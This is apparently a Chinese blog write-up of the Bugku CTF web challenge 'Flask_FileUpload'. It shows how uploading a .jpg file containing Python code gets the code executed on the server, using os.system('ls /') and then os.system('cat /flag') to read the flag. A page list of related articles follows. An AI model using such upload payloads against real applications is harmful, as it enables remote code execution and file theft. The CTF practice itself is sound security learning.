技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
凯子坚持 c
24 分钟前
生产级 Rust Web 应用架构:使用 Axum 实现模块化设计与健壮的错误处理
前端·架构·rust
IT_陈寒
31 分钟前
Python 3.12新特性实战:5个让你的代码效率翻倍的隐藏技巧!
前端·人工智能·后端
程序员小寒
38 分钟前
前端高频面试题之Vuex篇
前端·javascript·面试
The_Second_Coming
40 分钟前
Python 学习笔记:基础篇
运维·笔记·python·学习
诗句藏于尽头
41 分钟前
python实战学习记录
python·学习
网硕互联的小客服
1 小时前
如何解决 Linux 文件系统挂载失败的问题?
linux·服务器·前端·网络·chrome
AI松子666
1 小时前
PyTorch-混合精度训练(amp)
人工智能·pytorch·python
MDLZH
1 小时前
Pytorch性能调优简单总结
人工智能·pytorch·python
程序员爱钓鱼
2 小时前
Python 编程实战 · 实用工具与库 — Flask 路由与模板
前端·后端·python
程序员爱钓鱼
2 小时前
Python 编程实战 · 实用工具与库 — Django 项目结构简介
后端·python·面试
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04Linux下V2Ray安装配置指南05综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件06BongoCat - 跨平台键盘猫动画工具07Labelme从安装到标注:零基础完整指南08jdk21下载、安装(Windows、Linux、macOS)09全面评测 | Photoshop 2026 新特性深度解析与实测体验10刚刚!字节 Trae SOLO 正式发布,限时免费